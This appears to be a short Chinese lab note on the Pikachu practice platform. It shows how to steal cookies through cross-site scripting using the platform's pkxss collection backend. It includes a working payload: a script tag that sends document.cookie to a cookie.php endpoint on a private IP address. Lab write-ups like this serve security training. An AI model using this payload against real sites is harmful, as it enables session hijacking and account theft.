原理图：

pikachu提供了一个pkxss后台；

该后台可以把获得的cookie信息显示出来；

查看后端代码cookie.php：就是获取cookie信息，保存起来，然后重定向跳转到目标页面；修改最后从定向的ip，改为自己测试用的IP地址；

对此，构造攻击payload， 获取到cookie ，然后从定向跳转到pkxss后台，pkxss后台把数据保存后，重新重定向回到被攻击的页面。

<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后，重定向到pkxss后台把数据保存起来

得到攻击信息。